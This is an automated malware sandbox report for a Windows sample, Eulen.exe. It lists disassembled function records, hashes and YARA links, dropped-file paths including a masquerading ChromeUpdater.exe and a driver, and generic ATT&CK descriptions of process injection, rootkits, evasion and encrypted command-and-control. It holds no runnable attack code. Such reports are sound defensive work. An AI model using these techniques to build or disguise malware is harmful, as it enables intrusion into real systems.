Function 000002917C980604 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 000002917C98071B
GetLastError.KERNEL32 ref: 000002917C98073D

Strings

U, xrefs: 000002917C9806C7

Memory Dump Source

Source File: 0000001D.00000002.2687432521.000002917C970000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C970000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2917c970000_svchost.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction ID: d068bae5036d0eee0de407b254fed1348c06666d9d9557c42f5e96979ee8fe78
Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction Fuzzy Hash: 1741B572315A82C1FBA09F66E8483EAB7E0F389B84F515125EE4E87798DB3CC551CB40

Function 000002917C3BD6C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000002917C3BD6F9
LCMapStringW.KERNEL32 ref: 000002917C3BD781

Strings

LCMapStringEx, xrefs: 000002917C3BD6DC, 000002917C3BD6ED

Memory Dump Source

Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd

Similarity

API ID: Stringtry_get_function
String ID: LCMapStringEx
API String ID: 2588686239-3893581201
Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction ID: 14c1072200d825e8a7b497d491b17a69046bfdff55b13357bba79c5b080fc5ed
Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction Fuzzy Hash: 7B113636308B8286E760DF96F4852DAB7A1F7C8B80F544126EE8D83B59DF38C4608B00

Function 000002917C3B94A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 000002917C3B94E8
RaiseException.KERNEL32 ref: 000002917C3B952E

Strings

csm, xrefs: 000002917C3B951B

Memory Dump Source

Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction ID: c86aaabd615968a03a70381e6e1a9290a19be8821cea87d1ba15289ae3364de5
Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction Fuzzy Hash: 61111C32218B8682EB658F56E545299B7A5F788B98F184221DF8D07B68DF3CC565CB00

Function 000002917C9794A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 000002917C9794E8
RaiseException.KERNEL32 ref: 000002917C97952E

Strings

csm, xrefs: 000002917C97951B

Memory Dump Source

Source File: 0000001D.00000002.2687432521.000002917C970000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C970000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2917c970000_svchost.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction ID: 0abadc274f8d33753a0593f38f9897fc56eb46907de91766e49cb8776aacca17
Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction Fuzzy Hash: 7E115432205B8282EB608F26F4443A9B7E0F785B94F594215DF8D07B64DF3CC561C700

Function 000002917C3BD65C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000002917C3BD68D
InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 000002917C3BD6A7

Strings

InitializeCriticalSectionEx, xrefs: 000002917C3BD681

Memory Dump Source

Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpintry_get_function
String ID: InitializeCriticalSectionEx
API String ID: 539475747-3084827643
Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction ID: 6353e87e86811192389de0db5ea8fcbd5ca86f3ce0c0180d504e43c7d201f6fe
Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction Fuzzy Hash: 4BF08235314B8391FB25AFC3F44A6E9A321EB88B90F585025A95907B99CF3CC9B5C720

Function 000002917C97D65C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000002917C97D68D
InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 000002917C97D6A7

Strings

InitializeCriticalSectionEx, xrefs: 000002917C97D681

Memory Dump Source

Source File: 0000001D.00000002.2687432521.000002917C970000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C970000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2917c970000_svchost.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpintry_get_function
String ID: InitializeCriticalSectionEx
API String ID: 539475747-3084827643
Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction ID: cbb313881e4084d0fe17f811ea22f92c282591ecfa3051e383f9e4480f49f238
Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction Fuzzy Hash: C1F08222311783D2FB859BD3F4486F6A3A1BB89B90F485025AA5903F54CF38C9B5C700

Function 000002917C3BD608 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000002917C3BD631
TlsSetValue.KERNEL32 ref: 000002917C3BD648

Strings

FlsSetValue, xrefs: 000002917C3BD61E

Memory Dump Source

Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd

Similarity

API ID: Valuetry_get_function
String ID: FlsSetValue
API String ID: 738293619-3750699315
Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction ID: 5b8879814929d07e1a9a0cd258878afb26e6db0b23220b647961840e44a93d10
Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction Fuzzy Hash: A7E0E57131064391FA555BD7F84E7E9E322ABC8780F585125D91906395CF3CC975C730

Function 000002917C97D608 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000002917C97D631
TlsSetValue.KERNEL32 ref: 000002917C97D648

Strings

FlsSetValue, xrefs: 000002917C97D61E

Memory Dump Source

Source File: 0000001D.00000002.2687432521.000002917C970000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C970000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2917c970000_svchost.jbxd

Similarity

API ID: Valuetry_get_function
String ID: FlsSetValue
API String ID: 738293619-3750699315
Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction ID: 7bb1fa0e0d4c1e4a0d99fc1eb935b2830280e6d068342c5d905c6e6c0c120f29
Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction Fuzzy Hash: 52E06D62241643D2FB844BE2F8087F6A2A2BB89B80F489022D91907755DF38C975C700

Function 000002917C3B1D60 Relevance: 5.1, APIs: 4, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002917C3B1D9B
HeapAlloc.KERNEL32 ref: 000002917C3B1DAA
GetProcessHeap.KERNEL32 ref: 000002917C3B1E1E
HeapFree.KERNEL32 ref: 000002917C3B1E2C

Memory Dump Source

Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction ID: 67bf8005ee8a488def86704bb943a8d4b0a88b2be6388ac4e92eca18720aecea
Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction Fuzzy Hash: 2F218132704B8286FB619F9BE4092DAF3A1FB88B94F154115EE8C47B64EF7CC5628710

Function 000002917C971D60 Relevance: 5.1, APIs: 4, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002917C971D9B
HeapAlloc.KERNEL32 ref: 000002917C971DAA
GetProcessHeap.KERNEL32 ref: 000002917C971E1E
HeapFree.KERNEL32 ref: 000002917C971E2C

Memory Dump Source

Source File: 0000001D.00000002.2687432521.000002917C970000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C970000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2917c970000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction ID: 05704a076337ef02e917c48f5760be316bd823fb472f9ee5522c7c2deedd7627
Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction Fuzzy Hash: BD216226605B92C6FB918F9BE4082AAF3E0FB89B94F154115DE8D47B24FF78C5668700

Function 000002917C3B1274 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002917C3B127A
HeapAlloc.KERNEL32 ref: 000002917C3B1289
GetProcessHeap.KERNEL32 ref: 000002917C3B12A3
HeapAlloc.KERNEL32 ref: 000002917C3B12B4

Memory Dump Source

Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction ID: d76168678a2fc502f315b1b9b6f3c75eb188acf8bf3d020b4ec9175e5f6efc07
Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction Fuzzy Hash: 0DE039B17116028AF754ABA3D8093C9B6E1EB89B01F488024C90907390DF7D84A9C7A0

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	Drive: Drive Modification, File: File Modification, Firmware: Firmware Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	Process: OS API Execution, Process: Process Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Eulen.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Operating System Destruction

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Bitcoin Miner

Compliance

Spreading

Networking

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe

C:\Program Files\Google\Libs\WR64.sys

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b0ojllcn.cgo.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bfbhru4r.nsc.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fqciau5l.qg3.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hjmckk3c.srm.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j1wu2e0t.tme.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jqwxrnmy.eeh.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qifnalp1.m0n.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yoqn2kzl.xrt.ps1

C:\Users\user\AppData\Local\Temp\auqpbnqlvfdv.tmp

C:\Windows\System32\winevt\Logs\Application.evtx

C:\Windows\System32\winevt\Logs\Microsoft-Client-Licensing-Platform%4Admin.evtx

Windows Analysis Report
Eulen.exe

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre